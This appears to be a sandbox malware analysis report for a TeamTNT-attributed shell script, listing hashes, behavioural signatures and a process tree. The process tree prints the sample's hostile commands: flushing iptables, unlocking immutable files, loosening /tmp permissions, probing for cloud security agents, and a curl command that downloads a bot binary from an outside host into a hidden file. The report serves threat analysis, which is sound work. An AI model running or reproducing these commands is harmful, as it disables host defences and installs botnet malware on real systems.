Overview

overview

10

Static

static

10

SugarLogic...AWS.sh

ubuntu-18.04-amd64

6

SugarLogic...AWS.sh

debian-9-armhf

6

SugarLogic...AWS.sh

debian-9-mips

6

SugarLogic...AWS.sh

debian-9-mipsel

6

SugarLogic...nge.sh

ubuntu-18.04-amd64

6

SugarLogic...nge.sh

debian-9-armhf

6

SugarLogic...nge.sh

debian-9-mips

6

SugarLogic...nge.sh

debian-9-mipsel

6

SugarLogic...tup.sh

windows7-x64

3

SugarLogic...tup.sh

windows10-2004-x64

3

SugarLogic...bot.sh

windows7-x64

3

SugarLogic...bot.sh

windows10-2004-x64

3

SugarLogic...d_2.sh

ubuntu-18.04-amd64

7

SugarLogic...d_2.sh

debian-9-armhf

7

SugarLogic...d_2.sh

debian-9-mips

7

SugarLogic...d_2.sh

debian-9-mipsel

7

SugarLogic...oit.sh

windows7-x64

3

SugarLogic...oit.sh

windows10-2004-x64

3

SugarLogic...arch64

ubuntu-18.04-amd64

SugarLogic...arch64

debian-9-armhf

SugarLogic...arch64

debian-9-mips

SugarLogic...arch64

debian-9-mipsel

SugarLogic...x86_64

ubuntu-22.04-amd64

10

SugarLogic.../bot_u

ubuntu-22.04-amd64

10

SugarLogic...en2.sh

ubuntu-18.04-amd64

3

SugarLogic...en2.sh

debian-9-armhf

4

SugarLogic...en2.sh

debian-9-mips

3

SugarLogic...en2.sh

debian-9-mipsel

3

SugarLogic...cap.so

ubuntu-22.04-amd64

1

SugarLogic.../mo.sh

ubuntu-18.04-amd64

7

SugarLogic.../mo.sh

debian-9-armhf

7

SugarLogic.../mo.sh

debian-9-mips

10

Analysis

  • max time kernel
    149s
  • max time network
    31s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    29-12-2024 23:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SugarLogic_#teamtnt_by_@r3dbU7z/mo.sh

  • Size

    33KB

  • MD5

    dd89ab7314e13989bdcae176a82078ac

  • SHA1

    9ed46a6dde1dc1de4eed8185c1d622a5fc97092c

  • SHA256

    1b72088fc6d780da95465f80ab26ba094d89232ff30a41b1b0113c355cfffa57

  • SHA512

    e56722b308702bec178a1eca47c400af2435b57b190a10307aec0eebdfd4ef04ec6d63302a754b508a62d64668cb7b4edbc596a4e40c409e34b4934265d7db3d

  • SSDEEP

    768:DBxlT2wDGWvWCrDN+FylT4hxXpGdKI3oB6RXrsdrCIZMfXxK2eJ5tLW:qWN+Fyl1dRoGrq9W

Score
7/10
antivmdefense_evasiondiscovery

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Flushes firewall rules 1 TTPs 2 IoCs

    Flushes/ disables firewall rules inside the Linux kernel.

    defense_evasion
  • Writes DNS configuration 1 TTPs 1 IoCs

    Writes data to DNS resolver config file.

  • Attempts to change immutable files 3 IoCs

    Modifies inode attributes on the filesystem to allow changing of immutable files.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads CPU attributes 1 TTPs 2 IoCs
    discovery
  • Process Discovery 1 TTPs 2 IoCs

    Adversaries may try to discover information about running processes.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery

Processes

  • /tmp/SugarLogic_#teamtnt_by_@r3dbU7z/mo.sh
    "/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/mo.sh"
    1⤵
    • Writes DNS configuration
    PID:711
    • /bin/hostname
      hostname
      2⤵
        PID:716
      • /bin/ps
        ps aux
        2⤵
        • Reads CPU attributes
        • Process Discovery
        • Reads runtime system information
        PID:718
      • /bin/grep
        grep -i "[a]liyun"
        2⤵
          PID:719
        • /bin/ps
          ps aux
          2⤵
          • Reads CPU attributes
          • Process Discovery
          • Reads runtime system information
          PID:720
        • /bin/grep
          grep -i "[y]unjing"
          2⤵
            PID:721
          • /sbin/iptables
            iptables -F
            2⤵
            • Flushes firewall rules
            PID:722
          • /usr/bin/chattr
            chattr -ia /etc/resolv.conf
            2⤵
            • Attempts to change immutable files
            PID:727
          • /usr/bin/chattr
            chattr +i /etc/resolv.conf
            2⤵
            • Attempts to change immutable files
            PID:729
          • /usr/bin/chattr
            chattr -ia / /tmp/ /var/ /var/tmp/
            2⤵
            • Attempts to change immutable files
            PID:731
          • /bin/chmod
            chmod 1777 /tmp/ /var/ /var/tmp/
            2⤵
            • File and Directory Permissions Modification
            PID:732
          • /sbin/iptables
            iptables -F
            2⤵
            • Flushes firewall rules
            PID:734
          • /usr/bin/curl
            curl -sLk http://chimaera.cc/bin/KBot/x86_64 -o /tmp/.kube
            2⤵
            • Checks CPU configuration
            PID:736

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads